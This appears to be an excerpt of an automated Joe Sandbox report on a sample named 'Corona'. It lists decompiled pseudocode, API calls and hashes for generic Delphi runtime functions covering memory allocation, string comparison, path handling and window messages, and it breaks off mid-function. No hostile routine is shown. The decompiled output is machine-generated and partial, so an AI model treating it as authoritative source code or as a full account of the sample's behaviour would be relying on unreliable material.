                                  • Opcode Fuzzy Hash: 0ef6dd6ea0a7583c5597149073394501fd938edc92eb879c0ef5ecac17f741e7
                                  • Instruction Fuzzy Hash: B7E06DB1A003148FCB10DE58C8C1A4733D8BB48754F0009A6ED58EF386E375DD208BE8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00407AD0(void* __eax, void* __edx) {
                                  				int _t3;
                                  				char* _t5;
                                  				int _t7;
                                  				int _t10;
                                  				void* _t12;
                                  
                                  				_t12 = __eax;
                                  				_t3 = E0040410C(__edx);
                                  				_t5 = E0040430C(__edx);
                                  				_t7 = E0040410C(_t12);
                                  				_t10 = CompareStringA(0x400, 1, E0040430C(_t12), _t7, _t5, _t3); // executed
                                  				return _t10 - 2;
                                  			}









                                  APIs
                                  • CompareStringA.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,?,?,00407B17,?,?,00407EA1), ref: 00407AFD
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CompareString
                                  • String ID:
                                  • API String ID: 1825529933-0
                                  • Opcode ID: 6d8a940a681428d0d07aefee9c1a3cc682377ecffd4af08846e849c37c324d40
                                  • Instruction ID: 6d3a831ffb41c39d7498f46f71b70cf6dbd88d2acc670fabd014eaf60ef9679a
                                  • Opcode Fuzzy Hash: 6d8a940a681428d0d07aefee9c1a3cc682377ecffd4af08846e849c37c324d40
                                  • Instruction Fuzzy Hash: 36D09EE13105202AD654B6FE0D86F5B068C8B89719B00223AB708FA2C3D9BC8D4106ED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004016A8(signed int __eax, void** __ecx, intOrPtr __edx) {
                                  				signed int _v20;
                                  				void** _v24;
                                  				void* _t15;
                                  				void** _t16;
                                  				void* _t17;
                                  				signed int _t27;
                                  				intOrPtr* _t29;
                                  				void* _t31;
                                  				intOrPtr* _t32;
                                  
                                  				_v24 = __ecx;
                                  				 *_t32 = __edx;
                                  				_t31 = __eax & 0xfffff000;
                                  				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                  				 *_v24 = _t31;
                                  				_t15 = _v20 - _t31;
                                  				_v24[1] = _t15;
                                  				_t29 =  *0x4525e8; // 0x5ba96c
                                  				while(_t29 != 0x4525e8) {
                                  					_t17 =  *(_t29 + 8);
                                  					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
                                  					if(_t31 > _t17) {
                                  						_t17 = _t31;
                                  					}
                                  					if(_t27 > _v20) {
                                  						_t27 = _v20;
                                  					}
                                  					if(_t27 > _t17) {
                                  						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                  						if(_t15 == 0) {
                                  							_t16 = _v24;
                                  							 *_t16 = 0;
                                  							return _t16;
                                  						}
                                  					}
                                  					_t29 =  *_t29;
                                  				}
                                  				return _t15;
                                  			}













                                  APIs
                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401715
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 6b516112e56187e4cdffaeb55c8bbeca190ccf4b5deac7542238317eafebb680
                                  • Instruction ID: f98a9aafaff50bbb2ca684290b40d85e472c83ab9c3f8df584011134f5a0e072
                                  • Opcode Fuzzy Hash: 6b516112e56187e4cdffaeb55c8bbeca190ccf4b5deac7542238317eafebb680
                                  • Instruction Fuzzy Hash: 5811CE76A047059FC3108F29CC80A1BB7E5EFC4361F05C53EE598A73A5E735AC418B49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041A128(intOrPtr _a4, intOrPtr _a8) {
                                  				void* _t14;
                                  				void _t15;
                                  				intOrPtr _t25;
                                  				char* _t26;
                                  				void* _t35;
                                  
                                  				if( *0x452884 == 0) {
                                  					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
                                  					_t35 = _t14;
                                  					_t15 =  *0x452880; // 0x20e0000
                                  					 *_t35 = _t15;
                                  					_t1 = _t35 + 4; // 0x4
                                  					E004028B8(0x4503ec, 2, _t1);
                                  					_t2 = _t35 + 5; // 0x5
                                  					 *((intOrPtr*)(_t35 + 6)) = E0041A120(_t2, E0041A100);
                                  					_t4 = _t35 + 0xa; // 0xa
                                  					_t26 = _t4;
                                  					do {
                                  						 *_t26 = 0xe8;
                                  						_t5 = _t35 + 4; // 0x4
                                  						 *((intOrPtr*)(_t26 + 1)) = E0041A120(_t26, _t5);
                                  						 *((intOrPtr*)(_t26 + 5)) =  *0x452884;
                                  						 *0x452884 = _t26;
                                  						_t26 = _t26 + 0xd;
                                  					} while (_t26 - _t35 < 0xffc);
                                  					 *0x452880 = _t35;
                                  				}
                                  				_t25 =  *0x452884;
                                  				 *0x452884 =  *((intOrPtr*)(_t25 + 5));
                                  				 *((intOrPtr*)(_t25 + 5)) = _a4;
                                  				 *((intOrPtr*)(_t25 + 9)) = _a8;
                                  				return  *0x452884;
                                  			}









                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041A146
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 08db484000f1b3b7bd2ec46c471356415397cf5bd5ae5d8ee96f136c43daa6e5
                                  • Instruction ID: f847d22d3f01dd1dd75fe648ca62a3522005762b33191eeb26566d353b78ad07
                                  • Opcode Fuzzy Hash: 08db484000f1b3b7bd2ec46c471356415397cf5bd5ae5d8ee96f136c43daa6e5
                                  • Instruction Fuzzy Hash: 28115E742403059FD710EF59C880B86F7E5EF48390F20C63BE9588B386D3B8E8548BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E0040173C(void* __eax, void** __ecx, void* __edx) {
                                  				int _t7;
                                  				void* _t9;
                                  				signed int _t14;
                                  				intOrPtr* _t19;
                                  				signed int _t22;
                                  				void** _t23;
                                  
                                  				_push(__ecx);
                                  				 *_t23 = __eax + 0x00000fff & 0xfffff000;
                                  				_t22 = __eax + __edx & 0xfffff000;
                                  				 *__ecx =  *_t23;
                                  				_t7 = _t22 -  *_t23;
                                  				__ecx[1] = _t7;
                                  				_t19 =  *0x4525e8; // 0x5ba96c
                                  				while(_t19 != 0x4525e8) {
                                  					_t9 =  *(_t19 + 8);
                                  					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
                                  					if(_t9 <  *_t23) {
                                  						_t9 =  *_t23;
                                  					}
                                  					if(_t22 < _t14) {
                                  						_t14 = _t22;
                                  					}
                                  					if(_t14 > _t9) {
                                  						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
                                  						if(_t7 == 0) {
                                  							 *0x4525c4 = 2;
                                  						}
                                  					}
                                  					_t19 =  *_t19;
                                  				}
                                  				return _t7;
                                  			}










                                  APIs
                                  • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,004019A3), ref: 00401796
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 0d4d1b427f1ec69ba0c8b7c4076ac1d43960bee830523fbcc895a058ce1d439e
                                  • Instruction ID: 641e87d4905fd7c12af222c95323f90e351f4d8beb81f8afba53f3c53fc6d5e9
                                  • Opcode Fuzzy Hash: 0d4d1b427f1ec69ba0c8b7c4076ac1d43960bee830523fbcc895a058ce1d439e
                                  • Instruction Fuzzy Hash: 5D01F77AA443045FC3109E29DDC0E2A77E8EBC5324F15057FDE84A73A1D27AAC0187E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  C-Code - Quality: 53%
                                  			E00404F24(char* __eax, intOrPtr __edx) {
                                  				char* _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				struct _WIN32_FIND_DATAA _v334;
                                  				char _v595;
                                  				void* _t45;
                                  				char* _t54;
                                  				char* _t64;
                                  				void* _t83;
                                  				intOrPtr* _t84;
                                  				char* _t90;
                                  				struct HINSTANCE__* _t91;
                                  				char* _t93;
                                  				void* _t94;
                                  				char* _t95;
                                  				void* _t96;
                                  
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_v16 = _v8;
                                  				_t91 = GetModuleHandleA("kernel32.dll");
                                  				if(_t91 == 0) {
                                  					L4:
                                  					if( *_v8 != 0x5c) {
                                  						_t93 = _v8 + 2;
                                  						goto L10;
                                  					} else {
                                  						if( *((char*)(_v8 + 1)) == 0x5c) {
                                  							_t95 = E00404F10(_v8 + 2);
                                  							if( *_t95 != 0) {
                                  								_t14 = _t95 + 1; // 0x1
                                  								_t93 = E00404F10(_t14);
                                  								if( *_t93 != 0) {
                                  									L10:
                                  									_t83 = _t93 - _v8;
                                  									_push(_t83 + 1);
                                  									_push(_v8);
                                  									_push( &_v595);
                                  									L00401294();
                                  									while( *_t93 != 0) {
                                  										_t90 = E00404F10(_t93 + 1);
                                  										_t45 = _t90 - _t93;
                                  										if(_t45 + _t83 + 1 <= 0x105) {
                                  											_push(_t45 + 1);
                                  											_push(_t93);
                                  											_push( &(( &_v595)[_t83]));
                                  											L00401294();
                                  											_t94 = FindFirstFileA( &_v595,  &_v334);
                                  											if(_t94 != 0xffffffff) {
                                  												FindClose(_t94);
                                  												_t54 =  &(_v334.cFileName);
                                  												_push(_t54);
                                  												L0040129C();
                                  												if(_t54 + _t83 + 1 + 1 <= 0x105) {
                                  													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                                  													_push(0x105 - _t83 - 1);
                                  													_push( &(_v334.cFileName));
                                  													_push( &(( &(( &_v595)[_t83]))[1]));
                                  													L00401294();
                                  													_t64 =  &(_v334.cFileName);
                                  													_push(_t64);
                                  													L0040129C();
                                  													_t83 = _t83 + _t64 + 1;
                                  													_t93 = _t90;
                                  													continue;
                                  												}
                                  											}
                                  										}
                                  										goto L17;
                                  									}
                                  									_push(_v12);
                                  									_push( &_v595);
                                  									_push(_v8);
                                  									L00401294();
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
                                  					if(_t84 == 0) {
                                  						goto L4;
                                  					} else {
                                  						_push(0x105);
                                  						_push( &_v595);
                                  						_push(_v8);
                                  						if( *_t84() == 0) {
                                  							goto L4;
                                  						} else {
                                  							_push(_v12);
                                  							_push( &_v595);
                                  							_push(_v8);
                                  							L00401294();
                                  						}
                                  					}
                                  				}
                                  				L17:
                                  				return _v16;
                                  			}




















                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,004500A4,?,00405184,00000000,004051E1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404F41
                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00404F52
                                  • lstrcpyn.KERNEL32(?,?,?,?,00000001,004500A4,?,00405184,00000000,004051E1,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404F82
                                  • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,004500A4,?,00405184,00000000,004051E1,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404FE6
                                  • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,004500A4,?,00405184,00000000,004051E1,?,80000001), ref: 0040501B
                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,004500A4,?,00405184,00000000,004051E1), ref: 0040502E
                                  • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,004500A4,?,00405184,00000000), ref: 0040503B
                                  • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,004500A4,?,00405184), ref: 00405047
                                  • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040507B
                                  • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405087
                                  • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 004050A9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                  • API String ID: 3245196872-1565342463
                                  • Opcode ID: a49087359afbccc2ea5e90e63e4b60f7de63aaa6822c551a5f74ceed597ab360
                                  • Instruction ID: 49c6d4311e289c438fd2c70541c163e2c743289adc26ad2d4731e14be02609e3
                                  • Opcode Fuzzy Hash: a49087359afbccc2ea5e90e63e4b60f7de63aaa6822c551a5f74ceed597ab360
                                  • Instruction Fuzzy Hash: 6241B372900559AFDB10EAE8CD85ADFB7ECDF44304F1401FBA948F7291D6789E448B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E00435160(void* __eax) {
                                  				void* _v28;
                                  				struct _WINDOWPLACEMENT _v56;
                                  				struct tagPOINT _v64;
                                  				intOrPtr _v68;
                                  				void* _t43;
                                  				struct HWND__* _t45;
                                  				struct tagPOINT* _t47;
                                  
                                  				_t47 =  &(_v64.y);
                                  				_t43 = __eax;
                                  				if(IsIconic( *(__eax + 0x180)) == 0) {
                                  					GetWindowRect( *(_t43 + 0x180), _t47);
                                  				} else {
                                  					_v56.length = 0x2c;
                                  					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  				}
                                  				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
                                  					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
                                  					if(_t45 != 0) {
                                  						ScreenToClient(_t45, _t47);
                                  						ScreenToClient(_t45,  &_v64);
                                  					}
                                  				}
                                  				 *(_t43 + 0x40) = _t47->x;
                                  				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
                                  				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
                                  				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
                                  				return E0042DE48(_t43);
                                  			}











                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                  • String ID: ,
                                  • API String ID: 2266315723-3772416878
                                  • Opcode ID: 4df2605af39a00d05aa63d556f06aa7b2b168abb5a11a6a32e6e992e18841258
                                  • Instruction ID: 645734bca59295413249d5861259c1976bc353503050279604c6b6bdde8c1864
                                  • Opcode Fuzzy Hash: 4df2605af39a00d05aa63d556f06aa7b2b168abb5a11a6a32e6e992e18841258
                                  • Instruction Fuzzy Hash: 4A118E71904610AFCB11DF6DC885A8B37E8AF4D314F054A3EFD58DB286DB39E9048B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E004421FC(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				struct HMENU__* _v12;
                                  				signed int _v16;
                                  				char _v17;
                                  				intOrPtr _v24;
                                  				int _v28;
                                  				struct HDC__* _v32;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				intOrPtr _v44;
                                  				intOrPtr* _v48;
                                  				char _v52;
                                  				intOrPtr _t137;
                                  				signed int _t138;
                                  				intOrPtr _t144;
                                  				signed int _t150;
                                  				signed int _t151;
                                  				intOrPtr* _t153;
                                  				void* _t158;
                                  				struct HMENU__* _t160;
                                  				intOrPtr* _t165;
                                  				void* _t173;
                                  				signed int _t177;
                                  				signed int _t181;
                                  				void* _t182;
                                  				void* _t214;
                                  				struct HDC__* _t221;
                                  				void* _t251;
                                  				signed int _t257;
                                  				void* _t265;
                                  				signed int _t271;
                                  				signed int _t272;
                                  				signed int _t274;
                                  				signed int _t275;
                                  				signed int _t277;
                                  				signed int _t278;
                                  				signed int _t280;
                                  				signed int _t281;
                                  				signed int _t283;
                                  				signed int _t284;
                                  				signed int _t286;
                                  				signed int _t287;
                                  				signed int _t290;
                                  				signed int _t291;
                                  				intOrPtr _t307;
                                  				intOrPtr _t311;
                                  				intOrPtr _t333;
                                  				intOrPtr _t342;
                                  				intOrPtr _t346;
                                  				intOrPtr* _t353;
                                  				signed int _t355;
                                  				intOrPtr* _t356;
                                  				signed int _t367;
                                  				signed int _t368;
                                  				signed int _t369;
                                  				signed int _t370;
                                  				signed int _t371;
                                  				signed int _t372;
                                  				signed int _t373;
                                  				intOrPtr* _t375;
                                  				void* _t377;
                                  				void* _t378;
                                  				intOrPtr _t379;
                                  				void* _t380;
                                  
                                  				_t377 = _t378;
                                  				_t379 = _t378 + 0xffffffd0;
                                  				_v52 = 0;
                                  				_t375 = __edx;
                                  				_v8 = __eax;
                                  				_push(_t377);
                                  				_push(0x44272f);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t379;
                                  				_t137 =  *__edx;
                                  				_t380 = _t137 - 0x111;
                                  				if(_t380 > 0) {
                                  					_t138 = _t137 - 0x117;
                                  					__eflags = _t138;
                                  					if(_t138 == 0) {
                                  						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  						__eflags = _t271;
                                  						if(_t271 < 0) {
                                  							goto L67;
                                  						} else {
                                  							_t272 = _t271 + 1;
                                  							_t367 = 0;
                                  							__eflags = 0;
                                  							while(1) {
                                  								_t150 = E004415A8(E004136F8(_v8, _t367),  *(_t375 + 4), __eflags);
                                  								__eflags = _t150;
                                  								if(_t150 != 0) {
                                  									goto L68;
                                  								}
                                  								_t367 = _t367 + 1;
                                  								_t272 = _t272 - 1;
                                  								__eflags = _t272;
                                  								if(_t272 != 0) {
                                  									continue;
                                  								} else {
                                  									goto L67;
                                  								}
                                  								goto L68;
                                  							}
                                  						}
                                  					} else {
                                  						_t151 = _t138 - 8;
                                  						__eflags = _t151;
                                  						if(_t151 == 0) {
                                  							_v17 = 0;
                                  							__eflags =  *(__edx + 6) & 0x00000010;
                                  							if(( *(__edx + 6) & 0x00000010) != 0) {
                                  								_v17 = 1;
                                  							}
                                  							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  							__eflags = _t274;
                                  							if(__eflags < 0) {
                                  								L32:
                                  								_t153 =  *0x450fc8; // 0x452bb0
                                  								E0044E57C( *_t153, 0, __eflags);
                                  								goto L67;
                                  							} else {
                                  								_t275 = _t274 + 1;
                                  								_t368 = 0;
                                  								__eflags = 0;
                                  								while(1) {
                                  									__eflags = _v17 - 1;
                                  									if(_v17 != 1) {
                                  										_v12 =  *(_t375 + 4) & 0x0000ffff;
                                  									} else {
                                  										_t160 =  *(_t375 + 8);
                                  										__eflags = _t160;
                                  										if(_t160 == 0) {
                                  											_v12 = 0xffffffff;
                                  										} else {
                                  											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
                                  										}
                                  									}
                                  									_t158 = E004136F8(_v8, _t368);
                                  									_t295 = _v17;
                                  									_v16 = E004414EC(_t158, _v17, _v12);
                                  									__eflags = _v16;
                                  									if(__eflags != 0) {
                                  										break;
                                  									}
                                  									_t368 = _t368 + 1;
                                  									_t275 = _t275 - 1;
                                  									__eflags = _t275;
                                  									if(__eflags != 0) {
                                  										continue;
                                  									} else {
                                  										goto L32;
                                  									}
                                  									goto L68;
                                  								}
                                  								E0042B958( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
                                  								_t165 =  *0x450fc8; // 0x452bb0
                                  								E0044E57C( *_t165, _v52, __eflags);
                                  							}
                                  						} else {
                                  							__eflags = _t151 == 1;
                                  							if(_t151 == 1) {
                                  								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  								__eflags = _t277;
                                  								if(_t277 < 0) {
                                  									goto L67;
                                  								} else {
                                  									_t278 = _t277 + 1;
                                  									_t369 = 0;
                                  									__eflags = 0;
                                  									while(1) {
                                  										_v48 = E004136F8(_v8, _t369);
                                  										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
                                  										__eflags = _t173 -  *(_t375 + 8);
                                  										if(_t173 ==  *(_t375 + 8)) {
                                  											break;
                                  										}
                                  										_t177 = E004414EC(_v48, 1,  *(_t375 + 8));
                                  										__eflags = _t177;
                                  										if(_t177 == 0) {
                                  											_t369 = _t369 + 1;
                                  											_t278 = _t278 - 1;
                                  											__eflags = _t278;
                                  											if(_t278 != 0) {
                                  												continue;
                                  											} else {
                                  												goto L67;
                                  											}
                                  										} else {
                                  											break;
                                  										}
                                  										goto L68;
                                  									}
                                  									E00441DEC(_v48, _t375);
                                  								}
                                  							} else {
                                  								goto L67;
                                  							}
                                  						}
                                  					}
                                  					goto L68;
                                  				} else {
                                  					if(_t380 == 0) {
                                  						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  						__eflags = _t280;
                                  						if(_t280 < 0) {
                                  							goto L67;
                                  						} else {
                                  							_t281 = _t280 + 1;
                                  							_t370 = 0;
                                  							__eflags = 0;
                                  							while(1) {
                                  								E004136F8(_v8, _t370);
                                  								_t181 = E0044158C( *(_t375 + 4), __eflags);
                                  								__eflags = _t181;
                                  								if(_t181 != 0) {
                                  									goto L68;
                                  								}
                                  								_t370 = _t370 + 1;
                                  								_t281 = _t281 - 1;
                                  								__eflags = _t281;
                                  								if(_t281 != 0) {
                                  									continue;
                                  								} else {
                                  									goto L67;
                                  								}
                                  								goto L68;
                                  							}
                                  						}
                                  						goto L68;
                                  					} else {
                                  						_t182 = _t137 - 0x2b;
                                  						if(_t182 == 0) {
                                  							_v40 =  *((intOrPtr*)(__edx + 8));
                                  							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  							__eflags = _t283;
                                  							if(_t283 < 0) {
                                  								goto L67;
                                  							} else {
                                  								_t284 = _t283 + 1;
                                  								_t371 = 0;
                                  								__eflags = 0;
                                  								while(1) {
                                  									_v16 = E004414EC(E004136F8(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
                                  									__eflags = _v16;
                                  									if(_v16 != 0) {
                                  										break;
                                  									}
                                  									_t371 = _t371 + 1;
                                  									_t284 = _t284 - 1;
                                  									__eflags = _t284;
                                  									if(_t284 != 0) {
                                  										continue;
                                  									} else {
                                  										goto L67;
                                  									}
                                  									goto L69;
                                  								}
                                  								_v24 = E0041CD48(0, 1);
                                  								_push(_t377);
                                  								_push(0x442562);
                                  								_push( *[fs:eax]);
                                  								 *[fs:eax] = _t379;
                                  								_v28 = SaveDC( *(_v40 + 0x18));
                                  								_push(_t377);
                                  								_push(0x442545);
                                  								_push( *[fs:eax]);
                                  								 *[fs:eax] = _t379;
                                  								E0041D34C(_v24,  *(_v40 + 0x18));
                                  								E0041D1EC(_v24);
                                  								E004429D4(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
                                  								_pop(_t333);
                                  								 *[fs:eax] = _t333;
                                  								_push(0x44254c);
                                  								__eflags = 0;
                                  								E0041D34C(_v24, 0);
                                  								return RestoreDC( *(_v40 + 0x18), _v28);
                                  							}
                                  						} else {
                                  							_t214 = _t182 - 1;
                                  							if(_t214 == 0) {
                                  								_v44 =  *((intOrPtr*)(__edx + 8));
                                  								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  								__eflags = _t286;
                                  								if(_t286 < 0) {
                                  									goto L67;
                                  								} else {
                                  									_t287 = _t286 + 1;
                                  									_t372 = 0;
                                  									__eflags = 0;
                                  									while(1) {
                                  										_v16 = E004414EC(E004136F8(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
                                  										__eflags = _v16;
                                  										if(_v16 != 0) {
                                  											break;
                                  										}
                                  										_t372 = _t372 + 1;
                                  										_t287 = _t287 - 1;
                                  										__eflags = _t287;
                                  										if(_t287 != 0) {
                                  											continue;
                                  										} else {
                                  											goto L67;
                                  										}
                                  										goto L69;
                                  									}
                                  									_t221 =  *((intOrPtr*)(_v8 + 0x10));
                                  									L00406484();
                                  									_v32 = _t221;
                                  									 *[fs:eax] = _t379;
                                  									_v24 = E0041CD48(0, 1);
                                  									 *[fs:eax] = _t379;
                                  									_v28 = SaveDC(_v32);
                                  									 *[fs:eax] = _t379;
                                  									E0041D34C(_v24, _v32);
                                  									E0041D1EC(_v24);
                                  									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x442663, _t377,  *[fs:eax], 0x442680, _t377,  *[fs:eax], 0x4426a5, _t377, _t221);
                                  									_pop(_t342);
                                  									 *[fs:eax] = _t342;
                                  									_push(0x44266a);
                                  									__eflags = 0;
                                  									E0041D34C(_v24, 0);
                                  									return RestoreDC(_v32, _v28);
                                  								}
                                  							} else {
                                  								if(_t214 == 0x27) {
                                  									_v36 =  *((intOrPtr*)(__edx + 8));
                                  									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  									__eflags = _t290;
                                  									if(_t290 < 0) {
                                  										goto L67;
                                  									} else {
                                  										_t291 = _t290 + 1;
                                  										_t373 = 0;
                                  										__eflags = 0;
                                  										while(1) {
                                  											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E004136F8(_v8, _t373))) + 0x34))();
                                  											_t346 = _v36;
                                  											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
                                  											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
                                  												_v16 = E004414EC(E004136F8(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
                                  											} else {
                                  												_v16 =  *((intOrPtr*)(E004136F8(_v8, _t373) + 0x34));
                                  											}
                                  											__eflags = _v16;
                                  											if(_v16 != 0) {
